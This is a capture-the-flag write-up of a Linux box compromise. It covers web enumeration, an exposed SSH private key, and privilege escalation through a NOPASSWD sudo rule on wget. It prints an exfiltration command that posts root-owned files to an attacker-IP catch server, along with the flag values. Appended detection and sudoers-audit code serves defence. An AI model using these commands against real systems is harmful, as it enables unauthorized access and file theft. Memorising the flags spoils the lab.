Overview
A misconfigured web server exposes an SSH private key in a publicly accessible /.ssh/ directory. The username is harvested from an HTML comment in the page source. Privilege escalation is via a NOPASSWD sudo entry for wget, using --post-file to exfiltrate root-owned files.
Gobuster → /sitemap/ → HTML comment (username: jessie)
→ /sitemap/.ssh/id_rsa → SSH as jessie → user flag
→ sudo wget --post-file=/root/root_flag.txt → root flag
Reconnaissance
| Port | Service |
|---|---|
| 22/tcp | OpenSSH 7.2p2 |
| 80/tcp | Apache 2.4.18 |
Gobuster found /sitemap/. Page source contained:
<!-- Jessie don't forget to update the webiste -->
Further enumeration found /sitemap/.ssh/id_rsa — SSH private key publicly exposed.
Foothold
wget http://TARGET/sitemap/.ssh/id_rsa
chmod 600 id_rsa
ssh -i id_rsa jessie@TARGET
cat ~/Documents/user_flag.txt
USER: 057c67131c3d5e42dd5cd3075b198ff6
Privilege Escalation — sudo wget
sudo -l
# (root) NOPASSWD: /usr/bin/wget
wget --post-file sends a file's contents as the POST body to any URL. Because the sudo rule lets wget run as root without a password, it can read any root-owned file. Start a catch server, then exfiltrate:
# Attacker: start catch server
node -e "require('http').createServer((q,r)=>{let b='';q.on('data',c=>b+=c);q.on('end',()=>{console.log(b);r.end()})}).listen(8888)"
# Target: exfil root flag
sudo wget --post-file=/root/root_flag.txt http://OUR_IP:8888/ -q
ROOT: b1b968b37519ad1daa6408188649263d
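As an added example (not part of the original writeup), the defender-side check for this escalation path: detection of sudo wget --post-file over constructed auth.log lines, plus a sudoers audit for the NOPASSWD wget entry that sudo -l revealed. The log lines, hostname and the risky_bins list are assumptions.

```python
import re

# sudo's auth.log line format: "sudo: USER : TTY=... ; PWD=... ; USER=root ; COMMAND=..."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)
EXFIL_OPTS = ("--post-file", "--body-file")  # wget options that upload a local file

def find_wget_exfil(log_lines):
    """Return (invoking_user, run_as_user, local_file, url) per sudo wget upload."""
    hits = []
    for line in log_lines:
        m = SUDO_RE.search(line)
        if not m:
            continue
        argv = m.group("cmd").split()
        if not argv or not argv[0].endswith("wget"):
            continue
        local_file = url = None
        for i, arg in enumerate(argv):
            for opt in EXFIL_OPTS:
                if arg.startswith(opt + "="):           # --post-file=/path
                    local_file = arg.split("=", 1)[1]
                elif arg == opt and i + 1 < len(argv):  # --post-file /path
                    local_file = argv[i + 1]
            if arg.startswith(("http://", "https://", "ftp://")):
                url = arg
        if local_file:
            hits.append((m.group("user"), m.group("runas"), local_file, url))
    return hits

def risky_nopasswd(sudoers_lines, risky_bins=("wget", "curl", "scp", "ftp")):
    """Flag sudoers entries granting NOPASSWD on binaries that can read and send a file."""
    findings = []
    for line in sudoers_lines:
        stripped = line.strip()
        if stripped.startswith("#") or "NOPASSWD:" not in stripped:
            continue
        for cmd in stripped.split("NOPASSWD:", 1)[1].split(","):
            cmd = cmd.strip()
            if cmd and cmd.split()[0].rsplit("/", 1)[-1] in risky_bins:
                findings.append((stripped.split()[0], cmd))
    return findings

# Constructed sample log lines (not captured from the box); OUR_IP as in the writeup.
SAMPLE_AUTH_LOG = [
    "Mar  3 10:02:17 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt http://OUR_IP:8888/ -q",
    "Mar  3 10:03:01 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget -q http://mirror.example/pkg.deb",
    "Mar  3 10:03:40 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/bin/ls /root",
]
```

Only the first sample line is flagged: a plain download and a non-wget command pass through, so the rule keys on the upload option rather than on wget itself.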
Lessons Learned
- Always check /.ssh/ directories during web enumeration — exposed private keys are instant footholds.
- HTML comments leak usernames. Real-world developers leave notes in source.
- sudo wget = file read as root. --post-file exfiltrates any file. Classic GTFOBins technique.